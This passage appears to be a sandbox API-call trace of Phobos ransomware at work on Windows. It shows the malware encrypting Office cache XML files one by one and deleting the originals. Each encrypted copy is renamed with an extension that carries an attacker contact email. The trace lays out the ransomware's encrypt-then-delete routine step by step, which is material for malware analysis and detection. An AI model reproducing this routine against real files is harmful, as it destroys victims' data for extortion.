(hKey=0xa28e48) returned 1 [0132.737] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0132.737] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0132.737] Wow64DisableWow64FsRedirection (in: OldValue=0x2f4fd2c | out: OldValue=0x2f4fd2c*=0x0) returned 1 [0132.737] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0132.737] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0132.748] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0132.748] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0132.752] GetFileSizeEx (in: hFile=0x128, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1565) returned 1 [0132.752] CloseHandle (hObject=0x128) returned 1 [0132.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0132.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0132.753] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0132.754] ResetEvent (hEvent=0x108) returned 1 [0132.754] SetEvent (hEvent=0x10c) returned 1 [0132.754] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0132.754] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0132.754] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1450) returned 1 [0132.754] CloseHandle (hObject=0x12c) returned 1 [0132.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0132.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.754] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0132.755] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0132.755] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0132.755] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0132.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa28f08) returned 1 [0132.755] CryptSetKeyParam (hKey=0xa28f08, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0132.755] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5aa, lpOverlapped=0x0) returned 1 [0132.790] CryptEncrypt (in: hKey=0xa28f08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5b0) returned 1 [0132.790] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5b0, lpOverlapped=0x0) returned 1 [0132.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2e408) returned 1 [0132.792] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0132.792] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0132.792] CryptDestroyKey (hKey=0xa2e408) returned 1 [0132.792] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0132.793] CryptDestroyKey (hKey=0xa28f08) returned 1 [0132.793] CloseHandle (hObject=0x12c) returned 1 [0132.793] CloseHandle (hObject=0x130) returned 1 [0132.793] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0132.794] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0133.272] ResetEvent (hEvent=0x108) returned 1 [0133.272] SetEvent (hEvent=0x10c) returned 1 [0133.272] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.272] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.273] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1450) returned 1 [0133.273] CloseHandle (hObject=0x124) returned 1 [0133.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0133.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.273] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.273] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.273] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.273] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0133.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2f4e0) returned 1 [0133.273] CryptSetKeyParam (hKey=0xa2f4e0, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.273] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5aa, lpOverlapped=0x0) returned 1 [0133.461] CryptEncrypt (in: hKey=0xa2f4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5b0) returned 1 [0133.461] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5b0, lpOverlapped=0x0) returned 1 [0133.462] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2e408) returned 1 [0133.462] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.462] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0133.462] CryptDestroyKey (hKey=0xa2e408) returned 1 [0133.462] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0133.462] CryptDestroyKey (hKey=0xa2f4e0) returned 1 [0133.462] CloseHandle (hObject=0x124) returned 1 [0133.462] CloseHandle (hObject=0x130) returned 1 [0133.463] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0133.464] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0133.512] ResetEvent (hEvent=0x108) returned 1 [0133.512] SetEvent (hEvent=0x10c) returned 1 [0133.512] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.512] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.512] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3186) returned 1 [0133.513] CloseHandle (hObject=0x124) returned 1 [0133.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0133.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.513] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.513] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0133.514] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2f4e0) returned 1 [0133.514] CryptSetKeyParam (hKey=0xa2f4e0, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.514] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc72, lpOverlapped=0x0) returned 1 [0133.519] CryptEncrypt (in: hKey=0xa2f4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc80, dwBufLen=0xc80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc80) returned 1 [0133.519] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc80, lpOverlapped=0x0) returned 1 [0133.520] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2f520) returned 1 [0133.520] CryptSetKeyParam (hKey=0xa2f520, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.520] CryptEncrypt (in: hKey=0xa2f520, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0133.520] CryptDestroyKey (hKey=0xa2f520) returned 1 [0133.520] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0133.520] CryptDestroyKey (hKey=0xa2f4e0) returned 1 [0133.520] CloseHandle (hObject=0x124) returned 1 [0133.520] CloseHandle (hObject=0x134) returned 1 [0133.521] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0133.521] ResetEvent (hEvent=0x108) returned 1 [0133.522] SetEvent (hEvent=0x10c) returned 1 [0133.522] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.522] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0133.523] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4207) returned 1 [0133.523] CloseHandle (hObject=0x134) returned 1 [0133.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0133.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.523] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0133.523] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.523] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.523] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.523] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e408) returned 1 [0133.523] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.524] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x106f, lpOverlapped=0x0) returned 1 [0133.687] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1070, dwBufLen=0x1070 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1070) returned 1 [0133.687] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1070, lpOverlapped=0x0) returned 1 [0133.688] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa28ec8) returned 1 [0133.688] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.688] CryptEncrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0133.688] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0133.688] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0133.688] CryptDestroyKey (hKey=0xa2e408) returned 1 [0133.688] CloseHandle (hObject=0x134) returned 1 [0133.689] CloseHandle (hObject=0x124) returned 1 [0133.689] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0133.691] ResetEvent (hEvent=0x108) returned 1 [0133.691] SetEvent (hEvent=0x10c) returned 1 [0133.691] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.691] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.691] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1800) returned 1 [0133.691] CloseHandle (hObject=0x124) returned 1 [0133.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0133.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.691] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.691] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.691] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.691] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.712] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e4d8) returned 1 [0133.712] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x708, lpOverlapped=0x0) returned 1 [0133.760] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x710, dwBufLen=0x710 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x710) returned 1 [0133.760] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x710, lpOverlapped=0x0) returned 1 [0133.761] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2e518) returned 1 [0133.761] CryptSetKeyParam (hKey=0xa2e518, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.761] CryptEncrypt (in: 